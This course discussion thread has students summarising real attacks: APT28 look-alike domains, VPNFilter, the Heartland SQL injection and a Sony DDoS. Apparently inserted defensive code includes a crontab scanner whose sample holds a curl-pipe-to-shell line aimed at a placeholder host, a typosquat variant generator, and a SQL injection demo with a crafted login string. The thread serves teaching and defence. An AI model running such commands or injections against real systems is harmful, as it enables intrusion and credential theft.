A “hacker” can be an individual using their skills on behalf of an organization, testing security controls so that a non-authorized party does not obtain information and/or take systems offline. One could argue that the “ethical hacker” working for your organization is a “white hat”, and the non-authorized party is a “black hat.”
Research a recent attack on an organization that is directly attributed to some sort of “black hat” type of attack. Write a reply to this blog post:
- Who was affected?
- How were they affected?
- Were there after-effects?
- What type of attack was used?
- Who was the attacking party?
- Could/Should an internal team have put measures in place to prevent the attack, or reduce the impact?
Dan Bilenker says
US Senate & Conservative Think-tanks the Hudson Institute and the International Republican Institute almost fell victim to an unsuccessful domain squatting attempt.
Russian Government-sponsored hackers created six fake websites related to the US Senate and conservative think tanks to trick visitors and execute malicious code. Three fake domains were used to mimic US Senate websites, and one fake domain was used to mimic Microsoft’s products. Additionally, two more fake domains were designed to dupe visitors into thinking they belonged to US conservative organizations.
The two organizations involved were the Hudson Institute, a think-tank hosting extended discussions on topics including Cybersecurity (ironic, much), among other activities. The second organization was the International Republican Institute, a nonprofit group that promotes democracy worldwide. The organization has several notable members including the late Senator John McCain, and former RNC chairman Frank Fahrenkopf.
Fortunately, evidence suggests the hackers were unsuccessful in luring visitors to the fake websites. However, Microsoft confirmed that the sites were created over the last several months, and registered with major web hosting companies.
The attacks appear to be an attempt at Domain Squatting. Domain squatting is the practice of purchasing domain names that are similar to the intended URL, in an attempt to capitalize on typos by users searching for specific pages. Additionally, the resulting pages and related URLs were intended to mimic authentic page URLs and lure unsuspecting visitors. The pseudo-pages were built to replicate authentic pages in aesthetic and function.
Preliminary intelligence gathered by Microsoft suggests that the attacks were perpetrated by APT28, an organization believed to be tied to the Russian Government’s General Staff Main Intelligence Directorate (GRU), an arm of the Russian Military Intelligence branch. The group has a plethora of pseudonyms it also operates under, including Strontium, Fancy Bear, Sofacy, Sednit, and Pawn Storm.
Domain Squatting is a difficult type of attack to defend against, as it is costly and infeasible to own all the possible permutations of a URL. What is more concerning here is the lack of oversight on behalf of the web-hosting companies. Those domain names were easily identifiable, given the high profile of the sites they were designed to mimic. The web-hosting companies failed to perform due diligence in cross-referencing the URLs before authorizing their purchase.
Source: https://thehackernews.com/2018/08/air-canada-data-breach.html
Dan Bilenker says
My apologies regarding the link, here is the correct link:
https://thehackernews.com/2018/08/russia-election-hacking.html
Vince Kelly says
Excellent post Daniel, well written, clearly articulated, comprehensively researched and rife with intricate detail and specificity. But unfortunately your post must be classified as yet another attempt by the deep state at ‘Fake News’.
The rationale for this is clear Daniel – I’m sure that you’d agree that ‘the truth is not the truth’ and so, after ignoring overwhelming evidence from 17 different intelligence agencies to the contrary and after listening to the ‘powerful arguments and denials’ from one of this country’s greatest adversaries, our ‘bigly, stable genius, “leader” ‘ has assured us that the Russians are simply *not* involved in any form of state sponsored hacking against US institutions or critical US infrastructure. And given his track record of unwavering truthfulness and integrity how can you POSSIBLY not believe him? And so the facts that you’ve so adroitly presented about Russian attempts at interference must be Fake News.
I think that the surreal absurdity and contradiction of a ‘leader’ who is supposed to represent the morals and principles of the people he governs but fails to do so brings up an interesting “hypothetical” scenario that has implications for all security practitioners. It goes something like this:
“Hypothetical” Scenario with Implications for Security Professionals:
Suppose that you are a CSO employed by the largest company in your industry and suppose the CEO of that company has been completely compromised by organized crime – (let’s just assume for the sake of this scenario that it’s the Russian mob). What alternatives do you have and what actions could you take if this traitorous CEO has convinced the lemmings who make up the base of his support on the board of directors that, despite specific, concrete evidence to the contrary, the mob has *not* infiltrated your company and is not actively working to completely divide and undermine it?
In other words, what if you and everyone else in the entire world, (except the lemmings of course) have some pretty compelling circumstantial evidence that the Russian mob owns not only your company but your senior management as well?
Surely this is just a scenario, and clearly it doesn’t reflect what is actually happening in the real world today but after racking my brain for the past several months, the only solution that I can come up with for this challenging ‘hypothetical’ problem is to vote in November.
Can you think of any other options? 🙂 🙂 🙂
P.S., My comments were not directed at you Daniel and I apologize if I offended – they were only intended as a bit of humorous cynicism.
Vince Kelly says
Research a recent attack on an organization that is directly attributed to some sort of “black hat” type of attack.
The Black Hat attack that I researched was ranked by Wired Magazine as among “The Worst Cybersecurity Breaches of 2018 so Far”
(see: https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/, https://www.wired.com/story/2018-worst-hacks-so-far/, https://www.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet, and https://en.wikipedia.org/wiki/VPNFilter)
According to multiple reports, in May of this year, the FBI received a court order to seize a domain name and to take control of “a key server in the Kremlin’s global botnet of 500,000 hacked routers.”
Who was affected?
Malware called “VPNFilter” infected 500,000 home office routers across 54 different countries.
How were they affected?
According to Wikipedia, the malware had three stages and installed itself as follows:
1. Stage 1 involves a worm which adds code to the device’s crontab (the list of tasks run at regular intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and waits to be contacted by command and control systems.[7]
2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
3. Stage 3 can be any of various “modules” that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure “dark web” Tor software to communicate via encryption.[5]
Were there after-effects?
After the FBI seized the domain name “ToKnowAll.com” and redirected the traffic to their servers, the FBI has been collecting the IP addresses of the infected routers so that they can then inform the owners of those compromised routers that they need to shut down/restart the routers (the FBI is not permitted to collect any content other than the IP address of an infected router). The FBI is also working with ISPs to have them either reboot the infected routers that were part of their network or send notifications to the homeowners that they need to reboot their boxes.
What types of attacks were used?
VPNFilter uses known vulnerabilities to infect home office routers made by Linksys, MikroTik, NETGEAR, and TP-Link. Once in place, the malware sets up a command and control channel that can install ‘purpose-built plug-ins’. One of the plugins actually lets hackers eavesdrop on the victims’ Internet traffic in order to steal website credentials. Other exploits that were also found included targeting a protocol used in industrial control networks like those used in the electric grid. These protocols are the Modbus and SCADA industrial control protocols. Another type of exploit allows the attacker to cripple any or all of the infected devices at will. The command and control channel is used to help the exploit reestablish itself in the event of a reboot. As a result, the FBI seized a server and a domain name called “ToKnowAll.com” which was used to ensure the persistence of the exploit.
Who was the attacking party?
The Russian hacking group known as “Fancy Bear”
Could/should an internal team have put measures in place to prevent the attack or reduce its impact?
Given that most people have trouble programming even the simplest features on most types of electronic equipment, it would be unreasonable to expect that they would be able to even understand the potential of this kind of attack or to protect themselves if they did.
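The Stage 1 behaviour described in the post above (a crontab entry that survives reboots and keeps re-fetching later stages) is the kind of thing a defender can look for on any Linux host. The block below is an added example; it is not code from any post in this thread and not from any published VPNFilter analysis. It parses crontab text and scores each entry against generic persistence patterns (binaries in world-writable temp directories, download-and-run pipelines, base64-decoded payloads, every-minute or at-boot schedules). The sample crontab, the paths and the reporting threshold are all constructed for illustration.

```python
"""Crontab persistence triage: parse crontab text and score each entry
against generic persistence patterns. Added example; the sample crontab,
paths and threshold are constructed for illustration."""
import re

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = ("wget", "curl")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")
BASE64_DECODE = re.compile(r"base64\s+(-d|--decode)\b")
REPORT_THRESHOLD = 2  # entries scoring at least this much are reported


def parse_crontab(text):
    """Return [(schedule, command)] for each entry in crontab text.
    Handles the five-field schedule and @reboot/@hourly style shortcuts;
    blank lines, comments and VAR=value lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue  # shortcut with no command
            schedule, command = parts
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed line; nothing to score
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append((schedule, command.strip()))
    return entries


def score_entry(schedule, command):
    """Score one entry; returns (score, reasons). Weak signals (@reboot,
    every-minute) only reach the threshold together with a stronger one,
    because many legitimate jobs use those schedules."""
    score, reasons = 0, []
    if any(d in command for d in TEMP_DIRS):
        score += 2
        reasons.append("runs from a world-writable temp directory")
    if any(t in command for t in DOWNLOADERS) and PIPE_TO_SHELL.search(command):
        score += 3
        reasons.append("downloads and pipes into a shell")
    if BASE64_DECODE.search(command):
        score += 2
        reasons.append("decodes an embedded base64 payload")
    if schedule == "* * * * *":
        score += 1
        reasons.append("runs every minute (re-install loop pattern)")
    if schedule == "@reboot":
        score += 1
        reasons.append("runs at boot")
    return score, reasons


def triage_crontab(text):
    """Return the entries worth a look, highest score first."""
    report = []
    for schedule, command in parse_crontab(text):
        score, reasons = score_entry(schedule, command)
        if score >= REPORT_THRESHOLD:
            report.append({"schedule": schedule, "command": command,
                           "score": score, "reasons": reasons})
    return sorted(report, key=lambda e: e["score"], reverse=True)


# Constructed sample crontab: two ordinary jobs and two that match the
# persistence patterns above (example.invalid is a reserved test name).
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
@reboot /usr/local/bin/backup-agent start
* * * * * /var/tmp/.cache/update >/dev/null 2>&1
*/10 * * * * curl -s http://example.invalid/s | sh
"""

if __name__ == "__main__":
    for entry in triage_crontab(SAMPLE_CRONTAB):
        print(entry["score"], entry["schedule"], entry["command"])
        for reason in entry["reasons"]:
            print("   -", reason)
```

Run it against the output of `crontab -l` (per user) or the files under `/etc/cron.d`; on the sample above only the temp-directory job and the download-and-run job are reported, while the certbot and backup-agent entries score below the threshold.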
Dan Bilenker says
FancyBear strikes again! But in all seriousness, our adversaries are getting all too adept at compromising our data.
Vince Kelly says
You’re right – and (apparently) we are doing very little to prevent it from occurring again. Just saw an article where the Illinois State Board of Elections admitted that the Russians hacked into their voter registration DB and gained access to *76,000* voter records!
The famous quote describing war by Carl Von Clausewitz summed it up best:
“War is not merely a political act but a real political instrument, a continuation of political intercourse, a carrying out of the same by other means.”
This has not just revived the cold war, it’s revived it and taken it to an entirely new level (while we do nothing).
Dan Bilenker says
No offense taken, I can still detect sarcasm even through online posting – I’ll gladly take this over any of the futile Facebook arguments I’ve witnessed. Domain squatting is such a rudimentary means of hacking too. It doesn’t really require any technical knowledge, or advanced skills. It can be used in so many innocuous, or at least non-malicious, contexts as well.
When I was around 10, my teacher gave us an assignment to research a former president and write an essay/give a presentation.
Well, my naive 10-year-old self did not realize that all government websites have a .gov domain name. In my zeal to give the perfect presentation on George Washington, I visited http://www.whitehouse.com.
For those of you who are unaware, circa 1999, http://www.whitehouse.com was, let’s say, a website that featured individuals performing various acts most would consider inappropriate for a 10-year-old. Yes, indeed I was looking for whitehouse.gov, and my first encounter with Domain Squatting coincidentally also featured my first discussion of the birds and the bees.
That my friend, is NOT “fake news”.
William Bailey says
Purchasing a mis-typed version of a popular website can be used for profit, or can be used to deliver malicious content. Because there was no malware delivered via whitehouse.com, I would consider them just a look-alike site, trying to profit off of another brand’s image. There are multiple websites set up to “look like” payment websites such as PayPal that are specifically trying to lure unsuspecting visitors to their site and obtain their username, password, and other information from them, or offer drive-by downloads (e.g. video “filters”) for profit.
Kelly Conger says
Just a quick addition to this. I deal with issues like this on an almost daily basis. Without going into too much detail, the OCR feature on all of our company scanners doesn’t always do a great job when converting Word documents to a PDF file. Many times the @domain.xyz in either our company email address or an external customer’s email address will insert the wrong character, for example, replacing the “i” in the word domain with an “L”, so now it reads @domaLn.xyz in the scanned PDF. This will result in a false positive “domain squatting” or “typo squatting” phishing attempt. Often these are important documents with critical time constraints, so it can be frustrating to our end users because they will have to wait until we verify the mistake and manually release their email and attachment.
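Both the look-alike domains in Dan’s post on the Senate and think-tank sites and the OCR-mangled addresses in Kelly’s post come down to the same check: is an observed domain one small edit away from a domain you trust? The block below is an added example, not code from any post in this thread and not from any product. It generates common typo and confusable-character variants (omissions, adjacent swaps, doubled characters, i/l, 0/o, rn/m and similar substitutions) of a set of trusted domains and classifies observed domains against them. The trusted list, the observed list and the confusable table are constructed and deliberately small; it only varies the first label of each domain.

```python
"""Look-alike domain check: generate common typo and confusable-character
variants of trusted domains and classify observed domains against them.
Added example; the domains and observed list below are constructed."""

# Single-character substitutions that produce convincing look-alikes. Several
# pairs (i/l, 0/o, rn/m) are also what OCR engines confuse, which is why a
# scanned address can trip the same check as a deliberate typosquat.
CONFUSABLE = {
    "i": "l1", "l": "i1", "o": "0", "0": "o",
    "e": "3", "a": "4", "s": "5", "g": "q", "q": "g",
}
MULTI_CONFUSABLE = [("m", "rn"), ("rn", "m"), ("w", "vv"), ("vv", "w")]


def split_domain(domain):
    """Split 'label.suffix' into (label, suffix); only the first label is varied."""
    domain = domain.lower().strip().rstrip(".")
    label, _, suffix = domain.partition(".")
    return label, suffix


def lookalike_candidates(domain):
    """Return the set of look-alike domains derived from `domain` by single
    omissions, adjacent transpositions, doubled characters and confusable
    substitutions applied to its first label."""
    label, suffix = split_domain(domain)
    variants = set()
    for i, ch in enumerate(label):
        variants.add(label[:i] + label[i + 1:])                     # omission
        variants.add(label[:i] + ch + label[i:])                    # doubled char
        if i + 1 < len(label):                                      # swap neighbours
            variants.add(label[:i] + label[i + 1] + ch + label[i + 2:])
        for sub in CONFUSABLE.get(ch, ""):                          # substitution
            variants.add(label[:i] + sub + label[i + 1:])
    for src, dst in MULTI_CONFUSABLE:                               # rn/m, vv/w
        if src in label:
            variants.add(label.replace(src, dst, 1))
    variants.discard(label)
    variants.discard("")
    return {v + "." + suffix for v in variants}


def classify(observed, legit_domains):
    """Classify one observed domain: 'legitimate', 'lookalike:<trusted domain>'
    or 'unrelated'. Exact matches win before any look-alike test."""
    observed = observed.lower().strip().rstrip(".")
    trusted = [d.lower() for d in legit_domains]
    if observed in trusted:
        return "legitimate"
    for legit in trusted:
        if observed in lookalike_candidates(legit):
            return "lookalike:" + legit
    return "unrelated"


def scan(observed_domains, legit_domains):
    """Classify a batch of observed domains; returns {domain: verdict}."""
    return {d: classify(d, legit_domains) for d in observed_domains}


# Constructed sample: a trusted list and some domains as they might appear in
# new-registration feeds or in sender addresses pulled from scanned documents.
TRUSTED = ["senate.gov", "hudson.org", "microsoft.com", "domain.xyz"]
OBSERVED = ["senate.gov", "senat.gov", "hudsno.org", "rnicrosoft.com",
            "domaLn.xyz", "example.com"]

if __name__ == "__main__":
    for domain, verdict in scan(OBSERVED, TRUSTED).items():
        print(f"{domain:16} {verdict}")
```

The OCR case in Kelly’s post is the last observed entry: `domaLn.xyz` is classified as a look-alike of `domain.xyz` exactly because `i` and `l` are in the confusable table, which is why an automated filter holds it and a person has to confirm it was a scanning error rather than a spoofed sender.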
Duy Nguyen says
Heartland Payment Systems, a major payment processing company, experienced a breach in 2008 and reported a loss of more than 45 million customers’ data. The company stated that card numbers, expiration dates and in some cases cardholders’ names were exposed. Heartland’s systems were compromised with SQL injections to install sniffers that grabbed packets of transactions where financial data were exposed. The sniffer had compromised their systems months earlier, but Heartland was only alerted when suspicious activities were reported by Visa and MasterCard auditors.
SQL injections are the input of SQL commands in entry fields such as username and password on a login page of a website. These SQL commands are injected to attack the database, HTML, JavaScript, or XSLT. Based on the analysis, SQL injection could have been mitigated with basic parameterized database queries. There are other mitigation techniques for SQL injection prevention, but another basic one was a blacklist of characters with SQL meanings from the entry fields.
Another control that failed Heartland was an Intrusion Detection System. They were unaware of their exposure for months and countless packets of PII were captured; in the end, they were still unable to count the amount of data lost. Better controls and a more defined IDS process could have minimized losses and possibly avoided these attacks.
https://www.forbes.com/sites/davelewis/2015/05/31/heartland-payment-systems-suffers-data-breach/#4f763019744a
https://www.darkreading.com/attacks-and-breaches/heartland-payment-systems-hit-by-data-security-breach/d/d-id/1075770
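An added example to illustrate the parameterized-query mitigation mentioned in the post above; it is not Heartland’s code and not from the cited articles. Using Python’s built-in sqlite3 module and a constructed one-row users table, it puts a string-concatenated login lookup beside a parameterized one and shows why the concatenated version can be made to skip the password check while the parameterized version treats the same input as plain data.

```python
"""SQL injection: string-concatenated lookup beside its parameterized fix.
Added example using Python's built-in sqlite3 module and a constructed
one-row users table; not Heartland's code."""
import sqlite3


def make_db():
    """In-memory database with one constructed user. A real system would
    store a salted slow hash (bcrypt/argon2), not this placeholder string."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'placeholder-hash-for-alice')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, username, password_hash):
    """Builds the query by string formatting, so user input becomes part of
    the SQL text. A username containing a quote and a comment marker closes
    the string literal early and the password condition is never evaluated."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchone()


def safe_lookup(conn, username, password_hash):
    """Parameterized form: the SQL text is fixed and the driver passes the
    values separately, so a quote in the input is just a character to match."""
    query = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()


if __name__ == "__main__":
    conn = make_db()
    # Constructed input: closes the string literal and comments out the rest.
    crafted = "alice' --"
    print("vulnerable:", vulnerable_lookup(conn, crafted, "wrong"))       # ('alice',)
    print("parameterized:", safe_lookup(conn, crafted, "wrong"))         # None
    print("parameterized, right credentials:",
          safe_lookup(conn, "alice", "placeholder-hash-for-alice"))      # ('alice',)
```

Parameter binding is the primary control because it keeps the query structure and the data in separate channels; a character blacklist on the input fields, as also mentioned above, still mixes the two in one string and is easy to get wrong, so it is at best a secondary layer.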
Brandan Mackowsky says
Looking at this post reminds me of the 2014 attack on Sony’s PlayStation and Entertainment network services. While greatly impacting Sony’s ability to keep its systems and services online, a vast number of consumers were affected as they had no access to the PlayStation network or any entertainment services. From the attack, Sony was unable to provide services to its PlayStation and entertainment networks. The attacking party were black hat hackers presumably by the names of Fame or Lizard Squad. The group supported the demand to stop bombing on the radical group, ISIS. Until their demands were met, they explained there would be no access to the networks. In order to prevent use of these systems, the hackers used a DDoS attack to disrupt the servers by overflowing the traffic. A key point to look at is: could/should an internal team have put measures in place to prevent the attack, or reduce the impact? Regarding this area, it is definitely necessary for Sony to learn from its mistakes, and an internal team should be put in place not to prevent all attacks, but rather to have awareness of the vulnerabilities that exist in its realm of business. By understanding where vulnerabilities lie, Sony can prepare a strategy to deal with events as soon as they occur and quickly mitigate the impact and severity of each event.